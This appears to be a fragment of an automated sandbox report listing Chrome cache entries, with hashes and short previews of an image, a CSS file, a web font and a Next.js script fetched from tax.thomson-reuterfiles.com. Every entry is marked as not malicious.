                  SHA-512:E565B4F94019C358610645EC826844A1498F03AD2A86BA962C26847BCCC3A0E1490F21F7ECE24E19E7E26DF4FE64A2E0AFDCE3121E7548080545D61B1E1F7031
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/media/search-background-desktop.a9bd8cdc.png
                  Preview:.PNG........IHDR.............Y.H.....pHYs...%...%.IR$.....sRGB.........gAMA......a.....IDATx.......5....?.=.w.]......MHx}.Y............B.!..B.!..B.y@.......!.......F}.z.i.;.f9.1...[zGr.;].........ai....j....A......c.DC.)..6....N2..$...J..G..^|u.mV=JAl....d.z....~....]n..a..3....hU...('.f.!...}.I.*.k.`..B.!..B.!..B.a.5...S(.b.:P0_n.6.7.N..CW.r.*9T.Tv.B.f.j.&1.....8.D....X._..Y..Ckc4.. ..W....Q.S.Z..0....>....,S...#If.lH.......S.F.|[N..5...V.`.b.....s}x:n.....N.<!..B....Q.....1.6d..RF.....B.!$.w....6..d.M.YI..Og`...=..|..G...Y...\J.}..3...Q{kk6....+^......M...Pt..O?H.~.1.e}.&.ZeBh...<1.F.....r.9...../%%......-.e..^.mws6..44..s|r..O.M..>.....|.,.|I......u.(......ynl....p..EON...."...x....Du..=W.N^+..#..}y..z..l.T....c..S'{..T0...;.f.....1|...yB.!..2....Y~......s....on..y.fy...........K.............`..K.D.+.."..uq...E:dD..v...\.n.~...B.!.-.P.fL.x.y..W....?.;.....QI...nl...rm.....W...*.89=.).t...W.W..<.T.t^.Z..ui.,.*r..!jX@.S*.....q.M.Q..j

                  Chrome Cache Entry: 75

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (29860)
                  Category:downloaded
                  Size (bytes):30040
                  Entropy (8bit):5.166885302002284
                  Encrypted:false
                  SSDEEP:
                  MD5:31DE4512A833E5551978867D98FF011C
                  SHA1:CD7032688634A063ED7AF8B36400C61D575742EB
                  SHA-256:B2EDCCC182DDAC5009DB3D04D352201D7833006B9EAE33F5E8ECAFB6FC976FDB
                  SHA-512:7614EC6B5C309E62ED66AB621142E6A8566D8D3B8C8298E5C4E05CD41A272A9715E3E06631CD5047112B85F99F01646902365C3A70EA16202766A72B4BE69AC7
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/css/6c5712a607796dcd.css
                  Preview:@import url("https://fonts.googleapis.com/css2?family=Source+Sans+3:ital,wght@0,200..900;1,200..900&display=swap");./*.! tailwindcss v3.3.2 | MIT License | https://tailwindcss.com.*/*,:after,:before{box-sizing:border-box;border:0 solid #e5e7eb}:after,:before{--tw-content:""}html{line-height:1.5;-webkit-text-size-adjust:100%;-moz-tab-size:4;-o-tab-size:4;tab-size:4;font-family:ui-sans-serif,system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji;font-feature-settings:normal;font-variation-settings:normal}body{margin:0;line-height:inherit}hr{height:0;color:inherit;border-top-width:1px}abbr:where([title]){-webkit-text-decoration:underline dotted;text-decoration:underline dotted}h1,h2,h3,h4,h5,h6{font-size:inherit;font-weight:inherit}a{color:inherit;text-decoration:inherit}b,strong{font-weight:bolder}code,kbd,pre,samp{font-family:ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,L

                  Chrome Cache Entry: 76

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Web Open Font Format (Version 2), TrueType, length 39304, version 1.0
                  Category:downloaded
                  Size (bytes):39304
                  Entropy (8bit):7.994120188451945
                  Encrypted:true
                  SSDEEP:
                  MD5:20DCA63D8EE3254B712C7171AE987713
                  SHA1:BFF49469BB0DC3989D8DD4726A85D060396B100F
                  SHA-256:CCAEE6F0BB7DCF2A0EE729096CFBA2CF24EA535E068F6CBFB827F79733F8181D
                  SHA-512:F1678F40E5DC86ACE717DCB33196D31BF2951C36E266419E61580313BEFBC44C049CFC86267A5156C20B561B3ED213807D44A96B8F57EB22E04BD2133CD7AE98
                  Malicious:false
                  Reputation:unknown
                  URL:https://app-data.gcs.trstatic.net/wel-trdotcom/fonts/all-characters/knowledge2017-medium-webfont.woff2
                  Preview:wOF2............................................?FFTM..*......8.`..^..4..u.....h..'.6.$..Z..p.. .."..T..*?webf.[._...q...A.m[...t..r..p.........nc.. ...F3....._.4d,siI[.." .#..o.o... H1!.....4.........6.p...P.i.x.=...4""".....P%,J&V.K..~].d...........F.....-B.g....K...g#.O..P.u02.j.d../",LhI.T..F.{.r..}......p..,..+".(..\....#.=.>d;s]..R,..;$...S. u....F.[ ..+D..l.T.9a.. "....7jS.mr...............l."............H...<...Lv.xGF...L....|.......\..~...s.mJ.no......-q.Vy...C7..y.Lnu.T;.%K...O..O...W..{fA ....l.FF.<..?.=..B,..'X.bc.....*L...r.".?.g..].....{..c.o..E..E.(..F.#R..T... .>.k....*...qe|...../~3s......F.%....%.Q .=.....}.E.P.LX...p..$.........<..}..k..N~.j+...J....b..@..i..5..@.......sf...$/x@.J.P....$.*.0.u.R......&.Y1..b....D.!.).jn..Pr...w..n.........?.T<.J(/.N.`!.....8.M.....$.#.X.<..]...66B..x..N....1*. \.L]..\....%7r.%.y..F...WI...%tr.r.T.yzA...8v....b.........TOy.3...I...+.j.jTK<. ...../G........t.N....n.5,....M.7..7W..e..L...7.

                  Chrome Cache Entry: 77

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (54551)
                  Category:downloaded
                  Size (bytes):202199
                  Entropy (8bit):5.911594171548854
                  Encrypted:false
                  SSDEEP:
                  MD5:4CBBD1EB0EC89177917AD99F6C68F535
                  SHA1:DD9DF4DFDC929A5193122BBD1C9342CDF59F4FC5
                  SHA-256:BA7D803F2960371F9C72EAC0F1D2C9F2C874216C29470746545A6DB212BFD3CA
                  SHA-512:954EDBDEC7AD7AFA4F89E29C64C803C17F0D1F80122F15BC7B61574A908B0F4ADBD4C2FF8D871C5C8D371CDA5E0E2EDAB6BDA583ED0EC03717BAC476392B243F
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/chunks/pages/_app-1e66c022522ffc96.js
                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[888],{5687:function(m,R,H){"use strict";function invariant(m,R,H){if(void 0===H&&(H=Error),!m)throw new H(R)}H.d(R,{kG:function(){return invariant}})},5957:function(m,R,H){"use strict";function memoize(m,R){var H=R&&R.cache?R.cache:B,F=R&&R.serializer?R.serializer:serializerDefault;return(R&&R.strategy?R.strategy:function(m,R){var H,B,F=1===m.length?monadic:variadic;return H=R.cache.create(),B=R.serializer,F.bind(this,m,H,B)})(m,{cache:H,serializer:F})}function monadic(m,R,H,B){var F=null==B||"number"==typeof B||"boolean"==typeof B?B:H(B),U=R.get(F);return void 0===U&&(U=m.call(this,B),R.set(F,U)),U}function variadic(m,R,H){var B=Array.prototype.slice.call(arguments,3),F=H(B),U=R.get(F);return void 0===U&&(U=m.apply(this,B),R.set(F,U)),U}H.d(R,{A:function(){return F},H:function(){return memoize}});var serializerDefault=function(){return JSON.stringify(arguments)};function ObjectWithoutPrototypeCache(){this.cache=Object.create(nul

                  Static File Info

                  No static file info